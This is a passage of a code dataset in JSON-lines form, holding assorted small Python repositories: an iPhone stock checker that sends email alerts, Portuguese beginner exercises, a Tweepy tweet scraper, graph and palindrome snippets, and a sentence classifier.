For\n example:\n\n {'R245': {}, 'R369': {'MN912VC/A': 'ALL'}, 'R092': {}}\n '''\n response = requests.get(url.format(country_codes[country][0],\n country_codes[country][1]))\n\n stock_unfiltered = response.json()\n stock = {}\n\n # filtering the stock to stores of interest\n for store in stores:\n phones = {}\n if store in stock_unfiltered:\n # and models of interest\n for model in models:\n if model in stock_unfiltered[store]:\n phones[model] = stock_unfiltered[store][model]\n\n stock[store] = phones\n\n print(stock)\n return stock\n\ndef loadPreviousStockData():\n try:\n with open('previous_state.temp') as data_file:\n previous_stock = json.load(data_file)\n except:\n previous_stock = {}\n\n return previous_stock\n\ndef saveCurrentStockData(stock):\n # save results to file\n with open('previous_state.temp', 'w') as data_file:\n json.dump(stock, data_file)\n\ndef checkForNewAvailabilities(stock, previous_stock):\n '''Identifies if new stock has become available.\n\n Takes current and previous stock and returns a dictionary will all newly\n available stock.\n\n Args:\n stock: the current stock of the stores.\n previous_stock: the stock of the previous run.\n\n Returns:\n A dict of newly available stock. Example:\n\n {'R369': {'MN912VC/A': 'ALL'}}\n '''\n available_stock = {}\n\n for store in stock:\n for model in stock[store]:\n # Apple uses different codes for available, e.g. \"ALL\" or \"UNLOCKED\"\n if stock[store][model] != 'NONE':\n print(stock[store][model])\n if store not in previous_stock or model not in previous_stock[store]:\n if store in available_stock:\n available_stock[store].update({model: 'ALL'})\n else:\n available_stock[store] = {model: 'ALL'}\n elif previous_stock[store][model] == 'NONE':\n if store in available_stock:\n available_stock[store].update({model: 'ALL'})\n else:\n available_stock[store] = {model: 'ALL'}\n\n print(available_stock)\n return available_stock\n\ndef sendMail(sender, password, receipients, stock):\n '''Formats and sends the mail when new stock is available.\n\n Args:\n sender: gmail account used to send email.\n password: gmail account's password. 
Might be a application specific.\n receipients: email addresses of to whom to send the email.\n stock: dict of stores with available iphones.\n '''\n msg = ''\n for store in stock:\n for model in stock[store]:\n msg += '* ' + model + ' in ' + store + '\\r\\n'\n\n msg = 'Hi, new iPhones available' + '\\r\\n' + msg\n\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.ehlo()\n server.starttls()\n server.login(sender,password)\n server.sendmail(sender, receipients, msg)\n server.quit()\n\nstock = getCurrentStockData()\np_stock = loadPreviousStockData()\n\nnew_stock = checkForNewAvailabilities(stock, p_stock)\nif len(new_stock) > 0:\n sendMail(sender, sender_passwd, receipients, new_stock)\nsaveCurrentStockData(stock)\n","repo_name":"radikahl/scriptbude","sub_path":"iPhoneAvailability/iphone_stock_checker.py","file_name":"iphone_stock_checker.py","file_ext":"py","file_size_in_byte":5499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20952929857","text":"'''1.\"Faça um Programa que peça as quatro notas de 10 alunos,\ncalcule e armazene numa lista a média de cada aluno, imprima o\nnúmero de alunos com média maior ou igual a 7.0.\n\nmedias_alunos = []\nfor i in range(10): \n notas = [] \n for j in range(4): \n nota = float(input(f\"Digite a nota {j+1} do aluno {i+1}: \"))\n notas.append(nota)\n media = sum(notas) / len(notas)\n medias_alunos.append(media)\nalunos_aprovados = sum(1 for media in medias_alunos if media >= 7.0)\nprint(f\"Número de alunos com média maior ou igual a 7.0: {alunos_aprovados}\")\n\n\n2. Programa nome ao contrário em maiúsculas. Faça um programa\nque permita ao usuário digitar o seu nome e em seguida mostre o\nnome do usuário de trás para frente utilizando somente letras\nmaiúsculas. Dica: lembre−se que ao informar o nome o usuário\npode digitar letras maiúsculas ou minúsculas.\n\nnome = input(\"Digite o seu nome, em maiscúlas ou minúsculas: \")\nnome_invertido = nome.upper()[::-1]\nprint(nome_invertido)\n\n\n3. Escreva um programa em Python que onde todos os valores em\num dicionário são emitidos. Se sim , imprima True. Caso contrário,\nimprima Falso.\n\ndef verifica_valores(animais):\n for valor in animais.values():\n if valor is None or valor == \"\":\n return False\n return True\nexemplo_animais = {\n \"anfibios\": \"sapo\",\n \"aves\": \"calopsita\",\n \"mamiferos\": \"gato\",\n \"repteis\": \"\"\n}\nresultado = verifica_valores(exemplo_animais)\nif resultado:\n print(\"True\")\nelse:\n print(\"False\")\n\ndef verifica_valores(animais):\n for valor in animais.values():\n if valor is None or valor == \"\":\n return False\n return True\nexemplo_animais = {\n \"anfibios\": \"sapo\",\n \"aves\": \"calopsita\",\n \"mamiferos\": \"gato\",\n \"repteis\": \"cobra\"\n}\nresultado = verifica_valores(exemplo_animais)\nif resultado:\n print(\"True\")\nelse:\n print(\"False\")\n\n4. \"Utilizando listas faça um programa que faça 5 perguntas para\numa pessoa sobre um crime. As perguntas são:\n\"\"Telefonou para a vítima?\"\"\n\"\"Esteve no local do crime?\"\"\n\"\"Mora perto da vítima?\"\"\n\"\"Devia para a vítima?\"\"\n\"Já trabalhou com a vítima?\"\"\nO programa deve no final emitir uma classificação sobre a participação\nda pessoa no crime. Se a pessoa responder positivamente a 2 questões\nela deve ser classificada como \"\"Suspeita\"\", entre 3 e 4 como\n\"\"Cúmplice\"\" e 5 como \"\"Assassino\"\". 
Caso contrário, ele será\nclassificado como \"\"Inocente\"\".\n'''\n\ndef fazer_pergunta(pergunta):\n resposta = input(pergunta).strip().lower() \n return resposta == \"sim\" or resposta == \"s\" \n\nperguntas = [\n \"Telefonou para a vítima? \",\n \"Esteve no local do crime? \",\n \"Mora perto da vítima? \",\n \"Devia para a vítima? \",\n \"Já trabalhou com a vítima? \"\n]\n\nrespostas_positivas = 0\n\nfor pergunta in perguntas:\n if fazer_pergunta(pergunta):\n respostas_positivas += 1\nif respostas_positivas == 2:\n classificacao = \"Suspeita\"\nelif 3 <= respostas_positivas <= 4:\n classificacao = \"Cúmplice\"\nelif respostas_positivas == 5:\n classificacao = \"Assassino\"\nelse:\n classificacao = \"Inocente\"\nprint(f\"Classificação: {classificacao}\")\n","repo_name":"chandrasantos/bootcamp_python_django_womakerscode","sub_path":"3_exercicios_listas_tuplas_dicionarios.py","file_name":"3_exercicios_listas_tuplas_dicionarios.py","file_ext":"py","file_size_in_byte":3164,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"465685506","text":"graph={\r\n\r\n 0:[1,2],\r\n 1:[0,3,4],\r\n 2:[1,5],\r\n 3:[1],\r\n 4:[1],\r\n 5:[2]\r\n}\r\n\r\n\r\ndef dfs(current,visited):\r\n\r\n visited.add(current)\r\n \r\n\r\n if current==4:\r\n print(visited,end=\" \")\r\n\r\n for i in graph[current]:\r\n if i not in visited:\r\n dfs(i,visited)\r\n \r\n\r\ndfs(0,set())","repo_name":"yashsankh/Codes","sub_path":"dfs1.py","file_name":"dfs1.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36897407295","text":"num = int(input('Enter a number: '))\nh = i = 1\nwhile i <= num:\n l = []\n while h <= num:\n l.append(h)\n h += 1\n print(l)\n i += 1\n h = i\nwhile i > 0:\n k = []\n while num > 0:\n k.append(num)\n num -= 1\n print(k)\n i -= 1\n num = i","repo_name":"Musnik52/pyCodeBasement","sub_path":"begginer's code/numbpyramid.py","file_name":"numbpyramid.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7417906935","text":"import tweepy\nimport configparser\nimport datetime\nimport pandas as pd\nimport pytz\nimport time \nimport csv\nimport pandas as pd\n#check\n\nfrom config import Config\nfrom db_adapter import DbAdapter\nfrom os.path import abspath, dirname, join\nfrom tweets import Tweets\n\nutc=pytz.UTC\n\nCONFIGDIR = join(abspath(dirname(__file__)), 'config')\n\nproject_name = \"Twitter\"\n\nDB_CONFIG_FILE = join(CONFIGDIR, 'config.cfg')\nconfig = Config('config', CONFIGDIR)\ndba = DbAdapter(config.get_property(\"POSTGRES\", \"dialect\"),\n config.get_property(\"POSTGRES\", \"driver\"),\n config.get_property(\"POSTGRES\", \"host\"),\n config.get_property(\"POSTGRES\", \"database\"),\n config.get_property(\"POSTGRES\", \"username\"),\n config.get_property(\"POSTGRES\", \"password\"))\n\n# read configs\n\n\n# cached = Tweets().get_cached_data_by_project(dba, \"Twitter\")\n# cached.extend(Tweets().get_cached_data_by_project(dba, \"Twitter\"))\n\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\n\napi_key = config['twitter']['api_key']\napi_key_secret = config['twitter']['api_key_secret']\n\naccess_token = config['twitter']['access_token']\naccess_token_secret = config['twitter']['access_token_secret']\n\n# authentication\nauth = tweepy.OAuthHandler(api_key, api_key_secret)\nauth.set_access_token(access_token, 
access_token_secret)\n\napi = tweepy.API(auth)\n\n# user tweets\ndf = pd.read_csv(\"combined.csv\")\ndf.columns\n\nstartDate = datetime.datetime(2022, 1, 1, 0, 0, 0)\nendDate = datetime.datetime(2023, 1, 1, 0, 0, 0)\n\nstartDate= utc.localize(startDate) \nendDate = utc.localize(endDate) \n\n\nlimit=1000\nfor user in df['username']:\n tweets = tweepy.Cursor(api.user_timeline, screen_name=user, count=1000, tweet_mode='extended').items(limit)\n for tweet in tweets:\n if tweet.created_at > startDate:\n user = tweet.user.screen_name\n full_text = tweet.full_text\n date = tweet.created_at\n followers_count = tweet.user.followers_count\n\n d = {\n \"username\": user,\n \"tweet\": full_text,\n \"date_created\": date,\n \"followers_count\": followers_count,\n 'project_name': project_name\n \n\n }\n\n f = Tweets(**d)\n f.insert(dba)\n time.sleep(1)\n\n","repo_name":"SarahGrevy/dec_twitter","sub_path":"twitter_data_user.py","file_name":"twitter_data_user.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7481167665","text":"def solve(k, numbers):\n n = len(numbers)\n if n % k != 0:\n return \"No\"\n else:\n parts = [[] for i in range(n//k)]\n\ndef palindrome(s):\n # Write your code here\n n = len(s)\n count = 0\n for i in range(1,n):\n for j in range(n - i):\n if isPalin(s[j:j+1]):\n count += 1\n return count\n\ndef isPalin(s): \n if len(s) <= 1:\n return True\n elif len(s) == 2:\n return s[0] == s[1]\n else:\n if s[0] == s[-1]:\n return isPalin(s[1:-1])\n else:\n return False\n\nif __name__ == \"__main__\":\n print(isPalin(\"aabaaa\"))\n \n","repo_name":"reading-stiener/For-the-love-of-algos","sub_path":"Tests/twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"18579628943","text":"# -*- coding: utf-8 -*-\n\nfrom . 
import Base\nimport sqlalchemy as db\n\n\nclass TitleCount(Base):\n __tablename__ = 'title_counts'\n\n job_uuid = db.Column(db.String, primary_key=True)\n quarter_id = db.Column(db.SmallInteger, db.ForeignKey('quarters.quarter_id'), primary_key=True)\n job_title = db.Column(db.String)\n count = db.Column(db.Integer)\n\n def __repr__(self):\n return ''.format(\n self.quarter_id, self.job_uuid, self.count\n )\n","repo_name":"workforce-data-initiative/skills-airflow","sub_path":"api_sync/v1/models/title_count.py","file_name":"title_count.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"4681781601","text":"import argparse\nimport util_news\nimport logging\nfrom check_arguments import ArgumentTypeNotValidError, are_arguments_valid\nimport argparse, logging\n\nutil_news.inherit_logging_config()\n\n@util_news.log_start_end_func\ndef parse_arguments():\n \"\"\"\n Function in Module parse_arguments\n \n Used to take user arguments from the command line.\n Format is as such:\n \n $python main.py \n\n Three arguments - type_, search_keyword, and help.\n \n type_ -> The type of news that you want; the front feed or to search up for articles\n Takes arguments `feed` and `search`\n\n search_keyword -> ONLY USED IF LAST ARGUMENT WAS `search`\n Used as the search keyword when searching\n\n help -> Automatically brings up the help text if included\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(dest=\"type_\", help=\"Is the request a search or a retreival for the top headlines?\", type=str)\n parser.add_argument(dest=\"search_keyword\", help=\"Search keyword(s), if possible\",nargs=\"?\" , default=\"\")\n #add a help text argument\n parser.add_argument(dest=\"help_\", help=\"Does the user need the help info?\", nargs=\"?\", default=\"\")\n arguments = parser.parse_args()\n logging.debug(str(arguments))\n are_arguments_valid(arguments)\n return arguments\n\nparse_arguments()","repo_name":"tariksouabny/latest-news-python","sub_path":"news/parse_arguments.py","file_name":"parse_arguments.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8790183630","text":"import os, pybut, sys\n\nfrom Pyblio import Registry\n\nclass TestRegistry (pybut.TestCase):\n\n def setUp(self):\n Registry.reset()\n Registry.load_settings(pybut.src('ut_registry'))\n return\n\n def testSchemas(self):\n # The list of schemas only returns those for which we know the\n # path.\n self.failUnlessEqual(Registry.schemas(), ['with-path'])\n\n def testCategories(self):\n c = Registry.get('with-path', 'importers')\n assert len(c) == 2\n\n def testAdapters(self):\n c = Registry.get('with-adapter', 'adapters')\n self.failUnlessEqual(len(c), 1)\n\n c = c[0]\n self.failUnlessEqual(c.target, 'another/format')\n\n def testUnique(self):\n fd = open(',,sample.rip', 'w')\n fd.write('''\n[with-path]\n\npath: %(system)s/bibtex-2.xml\n''')\n fd.close()\n self.failUnlessRaises(AssertionError, Registry.load_settings, '.')\n \nsuite = pybut.suite (TestRegistry)\nif __name__ == '__main__': pybut.run (suite)\n","repo_name":"zkota/pyblio-core-1.3","sub_path":"tests/ut_registry.py","file_name":"ut_registry.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"16448842368","text":"\"\"\"\n缩放点积注意力机制实现\n\"\"\"\nimport torch\nimport torch.nn 
as nn\nimport math\n\nimport sys\nsys.path.append(r'myFunctions')\n\nfrom masked_softmax import masked_softmax\n\nclass DotProductAttention(nn.Module):\n \"\"\"缩放点积注意力\"\"\"\n def __init__(self, dropout, **kwargs):\n super(DotProductAttention, self).__init__(**kwargs)\n self.dropout = nn.Dropout(dropout)\n\n # queries的形状:(batch_size,查询的个数,d)\n # keys的形状:(batch_size,“键-值”对的个数,d)\n # values的形状:(batch_size,“键-值”对的个数,值的维度)\n # valid_lens的形状:(batch_size,)或者(batch_size,查询的个数)\n def forward(self, queries, keys, values, valid_lens=None):\n d = queries.shape[-1] # 查询和键的长度,要求必须相等\n # 设置transpose_b=True为了交换keys的最后两个维度\n # 使keys的形状转置为(batch_size,d,“键-值”对的个数)\n # scores的形状为(batch_size,查询的个数,“键-值”对的个数)\n scores = torch.bmm(queries, keys.transpose(1, 2)) / math.sqrt(d)\n self.attention_weights = masked_softmax(scores, valid_lens)\n # 模型为评估模式时,dropout不会起作用\n return torch.bmm(self.dropout(self.attention_weights), values)\n\n\nif __name__ == '__main__':\n queries = torch.normal(0, 1, (2, 1, 2))\n keys = torch.ones((2, 10, 2))\n values = torch.arange(40, dtype=torch.float32).reshape(1, 10, 4).repeat(\n 2, 1, 1)\n valid_lens = torch.tensor([2, 6])\n attention = DotProductAttention(dropout=0.5)\n attention.eval()\n tmp = attention(queries, keys, values, valid_lens)\n print(tmp)\n","repo_name":"Ljy0109/learn_pytorch","sub_path":"transformer/myFunctions/DotProductAttention.py","file_name":"DotProductAttention.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32995228736","text":"from openmdao.lib.datatypes.api import Float\n\nfrom vsp_wrapper.airfoil import Airfoil\nfrom vsp_wrapper.component import VSPComponent\nfrom vsp_wrapper.xml_container import XMLContainer\n\n\nclass Duct(VSPComponent):\n \"\"\" A duct. \"\"\"\n\n XMLTYPE = 'Duct'\n\n def __init__(self):\n super(Duct, self).__init__()\n self.add('duct_parms', DuctParms())\n self.add('airfoil', Airfoil())\n\n def read(self, this):\n \"\"\" Read parameters from XML tree element `this`. \"\"\"\n super(Duct, self).read(this)\n\n parms = this.find(DuctParms.XMLTAG)\n if parms is None:\n self.raise_exception('No %s element!?' % DuctParms.XMLTAG)\n self.duct_parms.read(parms)\n\n parms = this.find(Airfoil.XMLTAG)\n if parms is None:\n self.raise_exception('No %s element!?' % Airfoil.XMLTAG)\n self.airfoil.read(parms)\n\n def write(self, parent, nesting=0):\n \"\"\"\n Write parameters to XML tree under `parent`.\n Returns tree element.\n \"\"\"\n this = super(Duct, self).write(parent, nesting)\n\n self.duct_parms.write(this, nesting+1)\n self.airfoil.write(this, nesting+1)\n\n return this\n\n\nclass DuctParms(XMLContainer):\n \"\"\" XML parameters specific to a duct. 
\"\"\"\n\n XMLTAG = 'Duct_Parms'\n\n length = Float(5., low=0.001, high=10000.0, iotype='in',\n xmltag='Length', desc='')\n chord = Float(5., low=0.001, high=10000., iotype='in',\n xmltag='Chord', desc='')\n inlet_dia = Float(10., low=0.001, high=1000000., iotype='in',\n xmltag='Inlet_Dia', desc='')\n inlet_area = Float(10., low=0.001, high=1000000., iotype='in',\n xmltag='Inlet_Area', desc='')\n outlet_dia = Float(10., low=0.001, high=1000000., iotype='in',\n xmltag='Outlet_Dia', desc='')\n outlet_area = Float(10., low=0.001, high=1000000., iotype='in',\n xmltag='Outlet_Area', desc='')\n inlet_outlet = Float(1., low=0.1, high=10., iotype='in',\n xmltag='Inlet_Outlet', desc='')\n\n def __init__(self):\n super(DuctParms, self).__init__(self.XMLTAG)\n\n","repo_name":"OpenMDAO-Plugins/vsp_wrapper","sub_path":"src/vsp_wrapper/duct.py","file_name":"duct.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"25549830600","text":"# ****************************** Enhanced Dataset Wrappers ******************************\n#\n# Usage:\n#\n# import data_prep_utils\n# data_prep_utils.set_root(\"/content/drive/Shareddrives/{your-data-root-folder}/\")\n# from data_prep_utils import covid_19_radiography_dataset\n# data = covid_19_radiography_dataset.get_torch_dataset(transform=transforms.ToTensor())\n# loader = torch.utils.data.DataLoader(data, batch_size=64, shuffle=True)\n# ...\n#\n\n\n#\n# modules\n#\n\nfrom . import dataset\nfrom . import samplers\nfrom . import transforms\n\n\n#\n# root directory getters and setters\n#\n# set_root: this function configures root data directory. default is \"./data\" directory.\n# get_root: this function returns configured root data directory \"\"lazily\"\".\nfrom ._internal import get_root, set_root, lazy_init as init, _register_init_hook\n\n\n#\n# lazy data wrappers\n#\n\nfrom . import wrapper\n\ncovid_19_radiography_dataset = wrapper.COVID19RadiologyDataset()\nrsna_pneumonia_detection_challenge = wrapper.RSNAPneumoniaDetectionChallenge()\n\nfor w in (\n covid_19_radiography_dataset,\n rsna_pneumonia_detection_challenge\n):\n # lambda is lazy-evaluated, so do not use lambda expression.\n def __hook(__obj=w):\n return __obj.__data_root__ # warning: this may cause recursion while initialization\n _register_init_hook(__hook)\n\ndel _internal, wrapper, w, _register_init_hook, __hook # remove redundant classes from namespace\n\n\n__all__ = [\n\n # modules,\n 'dataset', 'samplers', 'transforms',\n\n # root directory getters and setters,\n 'get_root', 'set_root', 'init',\n\n # and wrapped datasets.\n 'rsna_pneumonia_detection_challenge',\n 'covid_19_radiography_dataset'\n\n]\n","repo_name":"kdha0727/lung-opacity-and-covid-chest-x-ray-detection","sub_path":"data_prep_utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"25473800246","text":"import sys\nimport os\n\nsys.path.insert(0, os.path.realpath('%s/..' 
% os.path.dirname(__file__)))\nimport autoconf\nimport plugins\n\nfrom plugins import lindat_db\nplugins.install_plugin('db', lindat_db, autoconf.settings)\n\nif __name__ == '__main__':\n plugin_db = plugins.runtime.DB.instance\n redis = getattr(plugin_db, 'redis')\n # cleanup caches etc.\n redis.flushdb()\n auth_db = plugin_db.get_instance('auth')\n redis = getattr(auth_db, 'redis')\n keys = list([key for key in list(auth_db.keys()) if key != '__user_count'])\n for key in keys:\n try:\n auth_db.hash_get_all(key)\n except:\n data = redis.hgetall(key)\n for k, v in list(data.items()):\n if k == 'id':\n v = int(v)\n auth_db.hash_set(key, k, v)\n","repo_name":"czcorpus/kontext","sub_path":"scripts/fix/fix_redis_json.py","file_name":"fix_redis_json.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"31"} +{"seq_id":"23587424298","text":"#!/usr/bin/env python\n\"\"\"\\\nfileEditor.py\n\nA file editor that can create files and can edit the desired file.\nFile path is fixed however\nusage: fileEditor.py\n\"\"\"\nimport sys\nimport pickle\nimport os\n\n# flag for continuous input\nmenu = 1\n\n# if called incorrectly exit the program\nif len(sys.argv[1:]) != 0:\n sys.exit(__doc__)\n\nfileName = input(\"Put the name of the file: \")\n\n# store filepath in string\nfilepath = \"data/\" + fileName + \".pk1\"\n\ndef printfile():\n for x in output:\n print(x + \"\\r\\n\")\n return\n\ndef append():\n global output\n entering = 1\n while (entering):\n buffer = input(\"Put contents of the file ({STOP} to exit): \")\n if '{STOP}' in buffer:\n entering = 0\n else:\n output.append(buffer)\n return\n\n\ndef delete():\n global output\n entering = 1\n counter = 0\n while (entering):\n buffer = input(\"Delete contents of the file ({STOP} to exit): \")\n if '{STOP}' in buffer:\n entering = 0\n else:\n for x in output:\n counter += 1\n if buffer in x:\n output.remove(x)\n print(x + \" was removed.\")\n break\n if counter == len(output):\n print(buffer + \" was not found\")\n return\n\n# if the file does not exist already create one, otherwise append\nif not os.path.isfile(filepath):\n output = []\nelse:\n with open(filepath, \"rb\") as write_file:\n output = pickle.load(write_file)\n\n# menu for options\nwhile (menu):\n print(\"[0] Print contents of file\\r\\n[1] Input into file\\r\\n[2] Delete from file\\r\\n[3] Exit and Save\")\n choice = input(\"_: \")\n if \"0\" in choice:\n printfile()\n elif \"1\" in choice:\n append()\n elif \"2\" in choice:\n delete()\n elif \"3\" in choice:\n menu = 0\n\n\nwith open(filepath, \"wb\") as write_file:\n pickle.dump(output, write_file)\n","repo_name":"Piyotr-K/discordbotv2","sub_path":"HGBot/fileEditor.py","file_name":"fileEditor.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28066078097","text":"import numpy as np\nfrom scipy import sparse\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\n\nfrom constants import TRAIN_RATIO, VALIDATION_RATIO, TEST_RATIO, RANDOM_SEED\nfrom data.bible.training_data import get_corresponding_sentences_in_bible as get_pairs\nfrom data.bible.training_data import get_corresponding_sentences_in_book_multiple_by_title\nfrom embedding.embedder import word2vec\nfrom pair_nn import get_hidden\n\n# WYC-WEB 0.97 
accuracy\n#trans_pairs = get_pairs('WYC', 'WEB')\n\n# ASV-CEB 0.95 accuracy\n# trans_pairs = get_pairs('ASV', 'CEB')\n\n# trans_pairs = get_corresponding_sentences_in_bible_multiple(['ASV', 'CEB', 'WYC', 'WEB'])\n\nuse_svm = True\ndef _get_classifier(c):\n if use_svm:\n return SVC(C=c, kernel='rbf', gamma=0.005)\n else:\n return LogisticRegression(C=c)\n\ndef get_corpus(trans1, trans2):\n vocab = set()\n trans_pairs = get_pairs(trans1, trans2)\n trans_pairs = [[translation.split(' ') for translation in pair] for pair in trans_pairs]\n\n for trans_pair in trans_pairs:\n for translation in trans_pair:\n for word in translation:\n vocab.add(word)\n\n return trans_pairs, vocab\n\ndef perform_split(feature_vectors, labels):\n train_val_feature_vectors, test_feature_vectors, train_val_labels, test_labels = train_test_split(\n feature_vectors, labels, test_size=TEST_RATIO, random_state=RANDOM_SEED\n )\n\n scaler = StandardScaler().fit(train_val_feature_vectors)\n train_val_feature_vectors = scaler.transform(train_val_feature_vectors)\n test_feature_vectors = scaler.transform(test_feature_vectors)\n\n test_feature_vectors = sparse.csr_matrix(test_feature_vectors)\n\n train_feature_vectors, validation_feature_vectors, train_labels, validation_labels = train_test_split(\n train_val_feature_vectors, train_val_labels, test_size=(VALIDATION_RATIO)/(VALIDATION_RATIO+TRAIN_RATIO), random_state=RANDOM_SEED\n )\n\n train_val_feature_vectors = sparse.csr_matrix(train_val_feature_vectors)\n train_feature_vectors = sparse.csr_matrix(train_feature_vectors)\n validation_feature_vectors = sparse.csr_matrix(validation_feature_vectors)\n\n print(\"Split dataset into training, test and validation sets.\")\n print(\"Training size: {}\".format(np.shape(train_feature_vectors)))\n print(\"Validation size: {}\".format(np.shape(validation_feature_vectors)))\n print(\"Test size: {}\".format(np.shape(test_feature_vectors)))\n return train_feature_vectors, validation_feature_vectors, train_val_feature_vectors, test_feature_vectors, train_labels, validation_labels, train_val_labels, test_labels\n\ndef get_unigram_features(trans1, trans2, use_unk=True):\n trans_pairs, vocab = get_corpus(trans1, trans2)\n word_to_index = {}\n num_words = 1\n for word in vocab:\n if use_unk and word not in word2vec.vocab:\n word_to_index[word] = 0\n else:\n word_to_index[word] = num_words\n num_words += 1\n\n print(\"Extracted vocabulary and mapping.\")\n\n # potentially speed this up by using a sparse representation.\n feature_vectors = []\n labels = []\n for trans_pair in trans_pairs:\n for i, translation in enumerate(trans_pair):\n unigram_features = [0.0]*num_words\n for word in translation:\n if word in vocab:\n unigram_features[word_to_index[word]] = 1.0\n feature_vectors.append(unigram_features)\n labels.append(i)\n\n print(\"Converted sentences to feature vectors and labels.\")\n print(\"\\tLabels: {}\".format(np.array(labels)))\n\n ret = perform_split(feature_vectors, labels)\n del feature_vectors\n del labels\n return ret\n\ndef get_nn_features():\n features1, features2 = get_hidden([\"style\", \"logvar_style\"])\n num_sents, num_feats = features1.shape\n labels = np.concatenate((np.array([0]*num_sents), np.array([1]*num_sents)), axis=0)\n features = np.concatenate((features1, features2), axis=0)\n features_labels = np.concatenate((features, np.expand_dims(labels, axis=1)), axis=1)\n assert features_labels.shape == (num_sents*2, num_feats+1)\n np.random.shuffle(features_labels)\n feature_vectors = features_labels[:,:-1]\n labels = 
features_labels[:,-1]\n\n print(\"Converted sentences to feature vectors and labels.\")\n print(\"\\tLabels: {}\".format(np.array(labels)))\n\n ret = perform_split(feature_vectors, labels)\n del feature_vectors\n del labels\n return ret\n\ndef check_matches(labels, predicted_labels):\n if np.size(labels) != np.size(predicted_labels):\n raise ValueError\n num_matches = np.sum(np.array(labels) == np.array(predicted_labels))\n proportion_matched = num_matches / np.size(labels)\n return (num_matches, proportion_matched)\n\ndef evaluate_pairs(trans1, trans2, type='unigram'):\n if type == 'unigram':\n process_inputs = get_unigram_features(trans1, trans2)\n else:\n process_inputs = get_nn_features()\n process(*process_inputs)\n\ndef process(train_feature_vectors, validation_feature_vectors, train_val_feature_vectors, test_feature_vectors, train_labels, validation_labels, train_val_labels, test_labels):\n print(\"Using validation set to optimize over value of regularization parameter in regression, C.\")\n best_acc = 0\n C_RANGE = [0.1, 1, 10]\n for C_cur in C_RANGE:\n \"\"\"\n It turns out that the default value is pretty good, with performance smoothly increasing then smoothly\n decreasing after 1. You can choose to verify this by passing in\n C_RANGE = [1e-5, 1e-4, 1e-3, 0.01, 0.1, 1, 10, 100, 1e3, 1e4, 1e5]\n \"\"\"\n print(\"\\tCurrent C: {}\".format(C_cur))\n classifier = _get_classifier(C_cur)\n classifier.fit(train_feature_vectors, train_labels)\n predicted_train_labels = classifier.predict(train_feature_vectors)\n predicted_validation_labels = classifier.predict(validation_feature_vectors)\n (_, train_acc) = check_matches(train_labels, predicted_train_labels)\n (_, val_acc) = check_matches(validation_labels, predicted_validation_labels)\n print(\"\\t\\tTraining accuracy: {}\".format(train_acc))\n print(\"\\t\\tValidation accuracy: {}\".format(val_acc))\n if val_acc > best_acc:\n best_C = C_cur\n best_acc = val_acc\n\n print(\"Done training and validating. 
Best C found: {}, Best accuracy on validation: {}\".format(best_C, best_acc))\n\n classifier = _get_classifier(best_C)\n classifier.fit(train_val_feature_vectors, train_val_labels)\n predicted_train_val_labels = classifier.predict(train_val_feature_vectors)\n predicted_test_labels = classifier.predict(test_feature_vectors)\n (num_matches_train, accuracy_train) = check_matches(train_val_labels, predicted_train_val_labels)\n (num_matches_test, accuracy_test) = check_matches(test_labels, predicted_test_labels)\n print(\"Accuracy on train {}\".format(accuracy_train))\n print(\"Accuracy on test {}\".format(accuracy_test))\n\nif __name__ == '__main__':\n evaluate_pairs('NIV', 'NIRV', type='nn')\n","repo_name":"bshimanuki/6.864","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":7170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71223565849","text":"'''\nEjercicio 3.20\nEl programa debe:\n\nPedir al usuario una cantidad de tramos de un viaje\npedir al usuario la duracion en minutos de cada tramo\ncalcular el tiempo total de viaje\nno deben generar errores\n'''\n\n#Init\ntramos = None\nduracion = None\ntotal = 0\n\n#Procesos\ntry:\n tramos = int(input('Ingrese la cantidad de tramos: '))\n for i in range(0, tramos):\n duracion = float(input('Ingrese los minutos del tramo: '))\n total += duracion\n print(f'La duracion es de: {round(total, 2)}')\n \nexcept Exception as error:\n print(f'Error{error}')","repo_name":"OmegaMLM/Algoritmos_Datos","sub_path":"Ejercicios/U3/ejercicio3_20.py","file_name":"ejercicio3_20.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19066336002","text":"import os\nimport random\nimport 